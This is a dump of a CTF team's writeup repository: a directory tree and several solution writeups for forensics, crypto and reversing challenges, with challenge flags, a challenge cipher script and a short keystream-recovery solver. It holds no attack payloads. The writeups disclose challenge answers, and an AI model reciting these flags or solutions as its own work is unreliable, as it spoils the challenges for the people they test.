├── .gitattributes ├── 2019-09-14-rwctf ├── Advertisement │ └── README.md ├── CaiDanTi │ └── README.md ├── crawl box │ └── README.md ├── faX senDeR │ └── README.md └── hCorem │ └── README.md ├── 2019-11-30-CTFZone └── Emerald Rush │ └── README.md ├── 2019-12-20-justCTF └── Ugliest website │ └── README.md ├── 2020-02-01-HackTM ├── Obey the Rules │ └── README.md ├── Quack the Quackers │ └── README.md ├── baby_bear │ └── README.md ├── dragon_sleeps_at_night │ └── README.md ├── merry cemetery │ └── README.md ├── papa bear │ └── README.md ├── rr │ ├── README.md │ └── flag.jpg ├── rsa_is_easy_1 │ └── README.md ├── rsa_is_easy_2 │ └── README.md ├── shifty │ └── README.md ├── strange_pcap │ └── README.md └── twisty │ └── README.md ├── 2020-02-23-BSidesSF ├── README.md ├── barcoder │ ├── README.md │ ├── cancer.png │ └── challenge.png ├── config-me │ └── README.md ├── decrypto2 │ ├── README.md │ ├── decrypto.py │ └── flag.svg.enc ├── eavesdropper │ ├── README.md │ ├── eavesdropper.wav │ └── spectrogram.png ├── haystack │ ├── README.md │ ├── chaffing.py │ ├── chaffing.pyc │ ├── data.bin │ └── message.pcap ├── mpfrag │ ├── README.md │ ├── cloud_flag.jpg │ ├── flag_cut.jpg │ ├── test.mpg │ └── test.zip ├── ripc4 │ └── README.md └── toast │ ├── README.md │ ├── ToastDynamicFlag.java │ ├── bacon-final.dex │ └── toast-clicker.apk ├── 2020-03-01-AeroCTF ├── README.md ├── aerofloat │ └── README.md ├── drawing │ └── README.md ├── elderly │ ├── README.md │ ├── file.enc │ ├── file.hex │ └── main.pyc ├── magic │ ├── README.md │ ├── output.txt │ └── task.py ├── mental_beginning │ ├── Beginning.HEX │ ├── Cheme.png │ └── README.md ├── mental_orderlies │ ├── README.md │ └── Smth.HEX ├── navigation_journal │ └── README.md ├── password_keeper │ └── README.md ├── plane_market │ └── README.md ├── save_the_plane │ └── README.md ├── shell_me │ └── README.md └── ticket_storage │ └── README.md ├── 2020-03-07-zer0ptsCTF ├── README.md ├── babybof │ └── README.md ├── dirty-laundry │ ├── README.md │ ├── 
chall.py │ ├── commented_chall.py │ ├── output.txt │ └── solve.py ├── diylist │ └── README.md ├── hipwn │ └── README.md ├── hobbit │ ├── README.md │ ├── chall.hbt │ └── hobbit.ko ├── locked │ ├── README.md │ └── gesture.key ├── meowmow │ └── README.md ├── nibelung │ ├── README.md │ ├── fglg.py │ ├── server.py │ └── solver.py ├── protrude │ └── README.md ├── qr │ ├── README.md │ ├── chall │ ├── decoded.txt │ ├── encrypted.qr │ ├── key │ └── out.png ├── ror │ ├── README.md │ ├── chall.py │ └── chall.txt ├── strcmp │ ├── README.md │ └── easystrcmp ├── syscall │ └── README.md ├── vmlog │ ├── README.md │ ├── log.txt │ └── vm.py └── wysinwyg │ ├── README.md │ └── wysinwyg ├── 2020-03-29-VolgaCTF ├── README.md └── dotnetme │ ├── README.md │ ├── check_flag.png │ ├── cleaned_with_de4dot.png │ ├── cli.png │ ├── computeHash.png │ ├── congratulation.png │ ├── de4dot.png │ ├── debugger_internal_error.png │ ├── extracted_key.png │ ├── hash_check.PNG │ ├── magic.gif │ ├── no_invalid_format.png │ ├── obfuscated.png │ ├── obfuscated2.png │ ├── sources │ ├── FlagChecker.cs │ ├── Program.cs │ └── Utils.cs │ ├── task.png │ ├── unknown_string.png │ └── vs.png ├── 2020-04-04-MidnightSun-quals ├── README.md ├── masterpiece │ ├── Mario Paint (Japan, USA).000 │ ├── README.md │ ├── flag.png │ └── masterpiece.000 └── verifier2 │ └── README.md ├── 2020-04-12-ByteBanditsCTF ├── README.md ├── aesy │ └── README.md ├── autobot │ ├── README.md │ └── payload.txt ├── baby_rust │ ├── README.md │ └── babyrust ├── ecb │ └── README.md ├── meet │ ├── README.md │ ├── meet.py │ └── solver.py ├── notes-app │ ├── README.md │ ├── images │ │ └── main.png │ └── sources │ │ ├── Dockerfile │ │ ├── config.py │ │ ├── docker-compose.yml │ │ ├── mynotes │ │ ├── __init__.py │ │ ├── main.py │ │ ├── models.py │ │ ├── templates │ │ │ ├── index.html │ │ │ ├── layout.html │ │ │ ├── login.html │ │ │ ├── profile.html │ │ │ ├── register.html │ │ │ ├── status.html │ │ │ └── visit_link.html │ │ └── visit_link.py │ │ ├── 
requirements.txt │ │ └── server.py ├── oldschool │ ├── 1.jpg │ └── README.md ├── rsyay │ ├── README.md │ └── solver.py ├── secure_des │ ├── README.md │ ├── securedes.py │ └── solver.py ├── string_equals │ ├── README.md │ ├── a │ │ ├── 0 │ │ ├── 1 │ │ ├── 2 │ │ ├── 3 │ │ ├── 4 │ │ ├── 5 │ │ ├── 6 │ │ ├── 7 │ │ ├── 8 │ │ ├── 9 │ │ ├── 10 │ │ ├── 11 │ │ ├── 12 │ │ ├── 13 │ │ ├── 14 │ │ ├── 15 │ │ ├── 16 │ │ ├── 17 │ │ ├── 18 │ │ └── 19 │ ├── chall.py │ ├── hashes.txt │ └── solver.py └── wooter │ └── README.md ├── 2020-04-17-PlaidCTF ├── README.md ├── dyrpto │ ├── README.md │ ├── generate_problem.py │ ├── message.proto │ ├── message_pb2.py │ └── output.txt └── sidhe │ ├── README.md │ ├── client.sage │ └── server.sage ├── 2020-04-25-IJCTF ├── README.md ├── klepto │ ├── README.md │ ├── enc │ └── klepto.py ├── nibiru │ ├── Nibiru.pdf │ └── README.md ├── plaintimage │ ├── README.md │ ├── flag.jpg.enc │ └── out.jpg ├── rev0 │ └── README.md └── space │ └── README.md ├── 2020-05-09-SpamAndFlags ├── README.md ├── ots │ ├── README.md │ ├── code.py │ └── ots.py ├── pwnzi_1 │ ├── README.md │ └── monies.png ├── pwnzi_2 │ └── README.md └── shor │ └── README.md ├── 2020-05-18-DefconQualification ├── README.md └── babymaze │ ├── README.md │ ├── files │ └── BabyMaze │ └── screenshots │ ├── connection-refused.png │ ├── flag.png │ └── maze.png ├── 2020-06-05-DefenitCTF ├── README.md ├── base64 │ └── README.md ├── catchmouse │ └── README.md ├── child_encrypter │ └── README.md ├── error │ └── README.md ├── fortune_cookie │ └── README.md ├── mixmix │ ├── README.md │ ├── mixmix │ ├── out.txt │ └── outbits.txt ├── moms_touch │ ├── README.md │ └── momsTouch ├── spn │ ├── README.md │ ├── SPN.py │ └── solver.py └── warmup │ └── README.md ├── 2020-07-03-ASIS-quals ├── README.md ├── baby_rsa │ ├── README.md │ ├── baby_rsa.py │ └── output.txt ├── crazy │ ├── README.md │ ├── crazy.py │ └── output.txt ├── dead_drop │ ├── README.md │ ├── dead_drop_1.py │ ├── dead_drop_2.py │ ├── flag1.enc │ ├── 
flag2.enc │ └── solver.sage ├── kaffee │ ├── COB │ ├── README.md │ └── flag.enc ├── latte │ ├── README.md │ ├── flag.latte │ └── latte ├── mgr │ ├── README.md │ ├── flag.enc │ └── mgr ├── titanic │ └── README.md └── tripolar │ ├── README.md │ ├── flag.enc │ ├── solver.sage │ └── tripolar.py ├── 2020-07-25-CybricsCTF ├── README.md ├── baby_re │ ├── README.md │ └── babyrev.xml ├── catgirl │ ├── README.md │ ├── do_not_pet_me.exe │ ├── final.py │ ├── flag.enc │ └── main.py ├── gcloud │ ├── README.md │ ├── gcloud.pcap │ └── result.jpg ├── gif2png │ ├── README.md │ └── main.py ├── hellish_re │ ├── README.md │ └── hellishreverse.tar.gz ├── hunt │ ├── README.md │ └── captcha.png ├── invitation │ ├── README.md │ └── broken_invitation.pdf ├── krevedka │ └── README.md ├── polyglot │ ├── README.md │ ├── code.c │ ├── code2.cpp │ └── code3.py ├── serial │ ├── 1.js │ └── README.md ├── too_secure │ ├── README.md │ └── too_secure.pdf └── xcorp │ ├── README.md │ ├── net10.exe │ └── xcorp.pcap ├── 2020-07-31-InCTF ├── README.md ├── archride │ ├── README.md │ └── surprise ├── backflip │ ├── README.md │ └── bakflips.py ├── coins │ └── README.md ├── dlpoly │ ├── README.md │ └── out.txt ├── maze │ ├── README.md │ └── output.gb ├── re_warmup │ ├── README.md │ └── warmup ├── rsapoly │ ├── README.md │ └── out.txt └── video │ ├── README.md │ ├── out.gif │ └── upload_file.php ├── 2020-08-24-GoogleCTF ├── README.md ├── android │ ├── README.md │ ├── activity.smali │ ├── listener.smali │ └── reverse.apk ├── basics │ ├── README.md │ ├── check.sv │ └── main.cpp ├── beginner │ ├── README.md │ └── beginner ├── chunk │ ├── README.md │ ├── challenge.py │ └── output.txt ├── sharky │ ├── README.md │ ├── challenge.py │ └── sha256.py └── yafm │ ├── README.md │ └── server.py ├── 2020-09-25-BalCCon ├── Katherine │ ├── README.md │ └── katherine.py ├── README.md ├── RaKeeJaPassRPC │ ├── README.md │ ├── client.py │ └── server.py ├── cryptosh │ ├── README.md │ └── cryptsh.py ├── do_u_have_knowledge │ ├── 
README.md │ └── server.py ├── heapmailer │ └── README.md ├── iot_grill │ └── README.md ├── mindgames_1336 │ └── README.md ├── mindgames_1337 │ └── README.md ├── mindgames_1338 │ └── README.md ├── ragequit │ └── README.md ├── shallweplayagame │ └── README.md └── turboblaise │ └── README.md ├── 2020-10-03-TastelessCTF ├── 711 │ ├── README.md │ ├── challenge.7z │ └── challenge2.7z ├── 712 │ ├── README.md │ ├── fixed.png │ └── raw_out.png ├── BabypadV2 │ ├── README.md │ └── chall.py ├── README.md └── petition │ ├── Challenge.java │ └── README.md ├── 2020-11-14-BalsnCTF ├── README.md ├── babyrev │ └── README.md ├── l5d │ └── README.md ├── last_bitcon │ └── README.md ├── patience2 │ └── README.md ├── the_woven_web │ └── README.md ├── tpc │ ├── README.md │ └── files │ │ ├── challenge.png │ │ └── object-containing-flag.tar.gz ├── transformer │ └── README.md ├── welcome2balsnctf │ ├── README.md │ └── files │ │ └── upload_95073691eadf0992593e82c3b59faeea.png └── windows_xp_media_player │ └── README.md ├── 2020-11-22-DragonCTF ├── README.md ├── apparmor2 │ └── README.md ├── babyshell │ └── README.md ├── bitflip1 │ ├── README.md │ ├── stage1.py │ └── task.py ├── bitflip3 │ ├── README.md │ ├── stage3.py │ └── task.py ├── coolname_checker │ └── README.md ├── harmony_chat │ ├── README.md │ └── files │ │ ├── harmony.zip │ │ └── main.png ├── heap-hop │ └── README.md ├── lookup_the_flag │ └── README.md ├── retrozeit │ ├── README.md │ └── retrozeit └── scratchpad │ ├── README.md │ └── files │ ├── flag.png │ ├── home.png │ ├── img-src.png │ ├── main.png │ └── sources │ ├── package.json │ ├── routes │ ├── index.ts │ └── notes.ts │ ├── schema.sql │ ├── serve.ts │ ├── setup.ts │ ├── static │ ├── bootstrap.min.css │ └── star.svg │ ├── utils.ts │ ├── views │ ├── edit.pug │ ├── error.pug │ ├── index.pug │ ├── layout.pug │ ├── login.pug │ ├── new.pug │ ├── note.pug │ ├── notes.pug │ └── register.pug │ ├── watch.ts │ └── yarn.lock ├── 2020-12-05-DefCampCTF ├── README.md ├── alien │ └── 
README.md ├── basiccoms │ └── README.md ├── bro64 │ └── README.md ├── broken │ └── README.md ├── hunting │ └── README.md ├── inorder │ ├── README.md │ └── inorder.py ├── modern │ ├── README.md │ ├── main.py │ └── modern-login.apk ├── notor │ ├── README.md │ └── shelladsasdadsasd.html.php ├── pros │ └── README.md ├── secret │ ├── README.md │ └── rev_secret_secret ├── spy │ ├── README.md │ ├── app-release.apk.zip │ └── coordinates_can_be_found_here.jpg ├── stripped │ ├── README.md │ └── rev_strippedGo_strippedGO.out ├── stug │ ├── README.md │ └── stug.jpg ├── team │ └── README.md ├── xor │ ├── README.md │ └── xor.py └── yopass │ ├── README.md │ └── yopass ├── 2021-01-16-BambooFox ├── README.md ├── babystack │ └── README.md ├── flag_checker │ └── README.md ├── hoc │ └── README.md ├── ngsteg │ └── README.md ├── turing │ └── README.md └── wxpage │ └── README.md ├── 2021-03-13-UTCTF ├── README.md ├── a_bit │ ├── README.md │ ├── bit_weird.py │ └── bit_weird_msg.txt ├── aeg │ ├── README.md │ └── angr.png ├── bacon │ └── README.md ├── cbc │ └── README.md ├── delete │ ├── README.md │ └── flash_drive.img.gz ├── emoji │ └── README.md ├── farmer │ ├── README.md │ └── output.txt ├── functional │ └── README.md ├── illegal │ └── README.md ├── linker │ └── README.md ├── messy_utf8 │ └── README.md ├── osint2 │ └── README.md ├── pyjail │ └── README.md ├── radio │ ├── README.md │ ├── demodulate.png │ └── off.iq ├── resolve │ └── README.md ├── sandwich │ ├── README.md │ ├── flag.jpg │ └── secret.pdf ├── sleeves │ └── README.md ├── small_p │ └── README.md ├── smol_data │ ├── README.md │ └── anomaly_detect.zip ├── various │ └── README.md └── zkp │ └── README.md ├── 2021-03-27-VolgaCTFQuals ├── README.md ├── inception │ ├── 1st_level.png │ ├── README.md │ ├── base26.txt │ ├── egypt.pdf │ ├── lsb.zip │ └── morse.txt ├── knock │ ├── README.md │ ├── knockd.pcap │ └── task.py └── streams │ ├── README.md │ ├── stream.pcap │ └── stream2.pcap ├── 2021-10-23-ASIS-quals ├── README.md ├── 
crypto_warmup │ ├── README.md │ ├── Warmup.py │ └── output.txt ├── factory │ ├── README.md │ └── factory.pdf ├── madras │ ├── Madras.py │ ├── README.md │ └── output.txt ├── pinhole │ ├── README.md │ ├── output.sage │ ├── output.txt │ └── pinhole.sage └── spiritual │ └── README.md ├── 2023-01-13-idekctf ├── README.md ├── cleithrophobia │ └── README.md ├── coroutine │ └── README.md ├── minkymomo │ └── README.md ├── relativity │ └── README.md ├── sofire │ └── README.md ├── sprinter │ └── README.md ├── typop │ └── README.md └── weep │ └── README.md ├── 2023-06-21-p4ctf-finals ├── README.md ├── aes_observed │ └── README.md ├── ancient │ └── README.md ├── narco_chat │ ├── README.md │ └── client.pyc ├── pallas │ └── README.md ├── pepega │ ├── README.md │ └── server.go ├── rsa_kebab │ └── README.md └── scoundrelike │ ├── README.md │ └── scoundrelike ├── 2023-11-04-lakeCTF-quals ├── README.md ├── dive │ ├── README.md │ └── dive ├── ecc_key_sharer │ ├── README.md │ └── keysharer.py ├── funtran │ ├── README.md │ ├── arrayops.f90 │ └── funtran ├── random_rsa │ ├── README.md │ └── randomrsa.py ├── vigenere_cbc │ ├── README.md │ └── vigenere.py └── vimjail │ ├── README.md │ └── chall_vimrc1 ├── 2024-01-06-IrisCTF ├── README.md ├── asi │ └── README.md ├── babycharge │ └── README.md ├── dhash │ └── README.md ├── integralcommunication │ └── README.md ├── memory │ └── README.md └── seriousbanking │ └── README.md ├── 2024-01-27-RealWorldCTF ├── README.md ├── minioday │ └── README.md ├── partyhouse │ └── README.md └── truthplain │ └── README.md ├── 2024-03-15-KalmarCTF └── msrable │ ├── README.md │ └── exploit │ ├── Makefile │ ├── pwn.S │ └── solve.c ├── 2024-06-30-UIUCTF ├── README.md └── picoify │ ├── README.md │ ├── meme75.jpg │ ├── memescore.jpg │ └── pic16.jpg └── 2025-01-05-IrisCTF ├── README.md └── spicy_messaging_sinusoids ├── README.md ├── inspectrum.png ├── urh1.png └── urh2.png /.gitattributes: -------------------------------------------------------------------------------- 
# ASIS quals 2021, Pinhole: 7M of matrix
2021-10-23-ASIS-quals/pinhole/*.sage linguist-vendored
--------------------------------------------------------------------------------
/2019-09-14-rwctf/Advertisement/README.md:
--------------------------------------------------------------------------------
# Advertisement - Real World CTF 2019 Quals

Advertisement is a warmup task. The goal is to find the name of a product from
Chaitin, the organisers of the Real World CTF.

The English version of [Chaitin's website](https://www.chaitin.cn/en/) mentions
the following products:
- SafeLine
- D-Sensor
- X-Ray
- CloudWalker

**Flag**: `rwctf{XRay}`
--------------------------------------------------------------------------------
/2020-02-01-HackTM/rr/README.md:
--------------------------------------------------------------------------------
# RR (for, 298p, 67 solved)

In this challenge we get three RAID-5 disk images: 2 valid and 1 broken.
Since it's RAID-5 we can recover the missing parts of the data, because for a given block each drive contains either real data or the XOR of the data from the two other drives.

This means that we can XOR the two images we have, and then rebuild the disk from those 3 images.
We just used the tool `OSForensics` for the RAID rebuilding.

We only had to guess the size of the block, but we can estimate this by looking at the consecutive data blocks in the images we have.
There were some long text files on the disk, and they were a good target.
We can find some long text block followed by lots of null bytes, and this tells us the size is 65536 bytes.

With this we can rebuild the full disk image.

In the disk we can find that there is `Flag.jpg` somewhere there.
We can use binwalk, or just carve it out with a hex editor, looking for the `JFIF` magic:

![](flag.jpg)

Then we need to re-type a very long flag: `HackTM{1bf965b6e23e5d2cb4bdfa67b6d8b0940b5a23e98b8593bb96a4261fb8a1f66a}`
--------------------------------------------------------------------------------
/2020-02-01-HackTM/rr/flag.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-01-HackTM/rr/flag.jpg
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/README.md:
--------------------------------------------------------------------------------
# BSidesSF CTF 2020

Team: XeR, SIben, BitK, SakiiR, shalom

### Table of contents

* [Barcoder (forensics/101)](barcoder)
* [Decrypto2 (crypto)](decrypto2)
* [Eavesdropper (forensics)](eavesdropper)
* [haystack (crypto/forensics/re)](haystack)
* [mpfrag (forensics)](mpfrag)
* [toast clicker 1/2/3 (mobile)](toast)
* [config-me (re)](config-me)
* [ripc4 (pwn/crypto)](ripc4)
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/barcoder/README.md:
--------------------------------------------------------------------------------
# barcoder (forensics/101, 51p, 37 solved)

Zero technical challenge here, just tedious manual work.
We get a picture:

![](challenge.png)

The goal is to recover the barcode and decode it.
There is nothing special really: we cut out the barcode, used stegsolve to isolate a single color channel and get rid of all the surroundings, and then simply painted back the missing lines.
For each line there is at least a fraction left, so it's always clear how thick to make it.
Finally we arrive at:

![](cancer.png)

And ZXing gives us the flag: `CTF{way_too_common}`
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/barcoder/cancer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/barcoder/cancer.png
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/barcoder/challenge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/barcoder/challenge.png
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/config-me/README.md:
--------------------------------------------------------------------------------
# config-me - BSidesSF 2020 CTF (reverse, 472p, 4 solved)
## Introduction

config-me is a reversing task. It is also in the `101` category, hinting that it
should be quite easy.

This task contains two files: `config-me`, an ELF binary written in Rust, and
`config-me.conf`, which contains a name, a password, a comment, a conference title
and the flag.

The password and flag fields are encrypted:

```
password: E$0d6b731d24127ad34e76a78133c91e59f13ab12eaa8dc0ad99e10c71
flag: E$af7ac775b3716f6d6ae96fdb6080ef41f4918e0b9f2837b82105b5da39
```

## Reverse engineering

The best way to reverse a Rust binary is: you don't.


## Dynamic analysis

The `config-me` binary reads the configuration from `config-me.conf`. It then
displays `Welcome back, Ron [...]`, with Ron being the content of the `name`
field from the configuration.

The binary can be used to add/delete a key and save/load a configuration file. A
key can be encrypted, and then looks like the encrypted fields seen above.

By changing the configuration file and setting the `name` field to an encrypted
value, it will be decrypted and printed. Setting the `name` field to the
encrypted flag will reveal the flag:

```
Welcome back, CTF{my_rust_is_rusty}! Your config file currently has 5 entries. What would you like to do?
```

**Flag**: `CTF{my_rust_is_rusty}`
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/decrypto2/README.md:
--------------------------------------------------------------------------------
# Decrypto-2 (crypto, 65p, 26 solved)

In the challenge we get an [encryption algorithm](decrypto.py) and an [encrypted svg](flag.svg.enc).

The algorithm is a simple stream cipher.
The keystream is generated using:

```python
def __init__(self, key):
    super(HashCrypto, self).__init__(key)
    self._blk = self.key
    self._blkid = 0

def _extend_buf(self):
    self._blk = hashlib.sha256(
        self._blk + struct.pack('
```

Once we have that it's trivial to recover the flag:

```python
data = open("flag.svg.enc", 'rb').read()
prefix = ''
keystream = xor_string(data, prefix[:32])
crypter = HashCrypto(keystream)
# move keystream generation one block further
crypter._blkid = 1
crypter._blk = keystream
crypter._buf = keystream
open("out.svg", 'wb').write(''.join(crypter.encrypt(data)))
```

And we get `CTF{but_even_I_couldnt_break_IT}`
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/decrypto2/decrypto.py:
--------------------------------------------------------------------------------
import hashlib
import struct
import sys


class Crypto:

    def __init__(self, key):
        if not isinstance(key, bytes):
            raise TypeError('key must be of type bytes!')
        self.key = key
        self._buf = bytes()
        self._out = open("/dev/stdout", "wb")

    def _extend_buf(self):
        self._buf += self.key

    def get_bytes(self, nbytes):
        while len(self._buf) < nbytes:
            self._extend_buf()
        ret, self._buf = self._buf[:nbytes], self._buf[nbytes:]
        return ret

    def encrypt(self, buf):
        if not isinstance(buf, bytes):
            raise TypeError('buf must be of type bytes!')
        stream = self.get_bytes(len(buf))
        return bytes(a ^ b for a, b in zip(buf, stream))

    def set_outfile(self, fname):
        self._out = open(fname, "wb")

    def encrypt_file(self, fname):
        buf = open(fname, "rb").read()
        self._out.write(self.encrypt(buf))


class HashCrypto(Crypto):

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._blk = self.key
        self._blkid = 0

    def _extend_buf(self):
        self._blk = hashlib.sha256(
                self._blk + struct.pack(' [outfile]" % sys.argv[0])
        return
    argv.pop(0)
    key = argv.pop(0)
    inf = argv.pop(0)
    crypter = HashCrypto(key.encode("utf-8"))
    if sys.argv:
        crypter.set_outfile(argv.pop(0))
    crypter.encrypt_file(inf)


if __name__ == '__main__':
    main(sys.argv)
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/decrypto2/flag.svg.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/decrypto2/flag.svg.enc
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/eavesdropper/README.md:
--------------------------------------------------------------------------------
# Eavesdropper (forensics, 108p, 20 solved)

In the challenge we get a [wav recording](eavesdropper.wav) of a phone call where someone uses dial tones to input a secret code.
It's a rather classic forensics challenge, so we simply load the file into Audacity and run a DTMF decoder plugin.
Interestingly, the decoder had some issues with properly figuring out the length of the signal, outputting multiple values instead of one, but we can simply select one digit at a time.

If someone is interested in doing this `the hard way`, it's also pretty simple.
We can display the wav in Audacity as a `spectrogram`, select the frequency ranges to match DTMF codes, and we can see:

![](spectrogram.png)

Either way we can easily read the code: `665645`

Now we just need to call the given number, go bankrupt on international calls and get the flag `ctf{dtmf_is_awesome}`
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/eavesdropper/eavesdropper.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/eavesdropper/eavesdropper.wav
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/eavesdropper/spectrogram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/eavesdropper/spectrogram.png
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/haystack/chaffing.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/haystack/chaffing.pyc
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/haystack/data.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/haystack/data.bin
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/haystack/message.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/haystack/message.pcap
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/mpfrag/README.md:
--------------------------------------------------------------------------------
# Mpfrag (forensics, 423p, 7 solved)

A rather confusing forensics task.
I'm under the impression we solved this somehow not the intended way...

We get a file `disk.bin: Linux rev 1.0 ext2 filesystem data, UUID=07a34ef3-2282-447d-b2fd-1ade0b320153 (large files)`

By running binwalk on this we get an [encrypted zip](test.zip) which contains the file `cloud_flag.jpg`.
Seems like a good starting point.

The challenge name and description say something about MPEG, so we looked for mpg markers in the given disk image, and there were some, so we carved this out with a hex editor and got a [video](test.mpg).

The video clearly shows a password of some kind: `SF-G0lden-Gl0w-1848`.
And this password actually works almost fine for the ZIP.

There are some errors but we managed to get the [output jpg](cloud_flag.jpg).
The file seems to be broken somehow (perhaps the zip was not carved properly?) but we managed to open it anyway in some fancy image software.

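The marker-based carving of the video from the disk image, done above with a hex editor, can also be scripted. The following Python sketch is an added example, not part of the original writeup; the sample image is constructed, and the `max_gap` grouping heuristic and all function names are assumptions of this example.

```python
"""Carve MPEG program streams out of a raw disk image by start codes."""
from __future__ import annotations

PACK_START = b"\x00\x00\x01\xba"   # MPEG program stream pack header start code
PROGRAM_END = b"\x00\x00\x01\xb9"  # MPEG program end code


def _is_pack_header(image: bytes, off: int) -> bool:
    """Check the byte after the start code to weed out chance matches.

    An MPEG-1 pack header continues with the bits 0010, an MPEG-2 one with 01.
    """
    if off + 4 >= len(image):
        return False
    b = image[off + 4]
    return (b >> 4) == 0b0010 or (b >> 6) == 0b01


def find_pack_headers(image: bytes) -> list[int]:
    """Return the offsets of all plausible pack headers in the image."""
    offsets = []
    pos = image.find(PACK_START)
    while pos != -1:
        if _is_pack_header(image, pos):
            offsets.append(pos)
        pos = image.find(PACK_START, pos + 1)
    return offsets


def carve_streams(image: bytes, max_gap: int = 64 * 1024) -> list[tuple[int, int]]:
    """Return (start, end) byte ranges of candidate MPEG program streams.

    Pack headers that lie within max_gap bytes of each other are treated as
    one stream (assumption of this example). A run ends right after the first
    program end code found within max_gap of its last pack header; if there is
    none, max_gap bytes after the last header are kept so that the tail of a
    truncated or fragmented stream is not lost.
    """
    packs = find_pack_headers(image)
    ranges: list[tuple[int, int]] = []
    if not packs:
        return ranges
    start = prev = packs[0]
    for off in packs[1:] + [None]:
        if off is not None and off - prev <= max_gap:
            prev = off
            continue
        # Close the current run of pack headers.
        end_code = image.find(PROGRAM_END, prev, prev + max_gap)
        end = end_code + 4 if end_code != -1 else min(prev + max_gap, len(image))
        ranges.append((start, end))
        if off is not None:
            start = prev = off
    return ranges


def build_sample_image() -> tuple[bytes, int, bytes]:
    """Constructed test image: filler, a decoy start code, one small stream."""
    header = bytes([0x21, 0x00, 0x01, 0x00, 0x01, 0x80, 0x00, 0x01])  # MPEG-1 style
    pack1 = PACK_START + header + b"V" * 500
    pack2 = PACK_START + header + b"A" * 300
    stream = pack1 + pack2 + PROGRAM_END
    decoy = PACK_START + b"\xff"  # start code followed by invalid marker bits
    before = b"\x00" * 4096 + decoy + b"\x00" * 4091
    image = before + stream + b"\x00" * 8192
    return image, len(before), stream


if __name__ == "__main__":
    image, _, _ = build_sample_image()
    for n, (start, end) in enumerate(carve_streams(image)):
        print(f"stream {n}: offset {start:#x}, {end - start} bytes")
```

On a fragmented file each fragment shows up as its own range, so the ranges still have to be reviewed and joined in the right order by hand.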

It was only displaying the top half of the flag:
![flag\_cut.jpg](flag_cut.jpg)

With our unprecedented guessing skills we managed to figure out the flag: `CTF{bridge_ext2_gaps}`

--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/mpfrag/cloud_flag.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/cloud_flag.jpg
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/mpfrag/flag_cut.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/flag_cut.jpg
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/mpfrag/test.mpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/test.mpg
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/mpfrag/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/test.zip
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/toast/bacon-final.dex:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/toast/bacon-final.dex
--------------------------------------------------------------------------------
/2020-02-23-BSidesSF/toast/toast-clicker.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/toast/toast-clicker.apk
--------------------------------------------------------------------------------
/2020-03-01-AeroCTF/README.md:
--------------------------------------------------------------------------------
# Aero CTF 2020

Team: XeR, SIben, SakiiR, shalom

### Table of contents

* [Drawings on the walls (forensics)](drawing)
* [Elderly file (warmup/re)](elderly)
* [Mental adventure: beginning (warmup/PIC)](mental_beginning)
* [Mental adventure: call the orderlies (PIC)](mental_orderlies)
* [Magic1 (crypto)](magic)
* [Aerofloat (pwn)](aerofloat)
* [Shell Me If You Can (pwn/re)](shell_me)
* [Ticket Storage (pwn/re)](ticket_storage)
* [Plane Market (pwn)](plane_market)
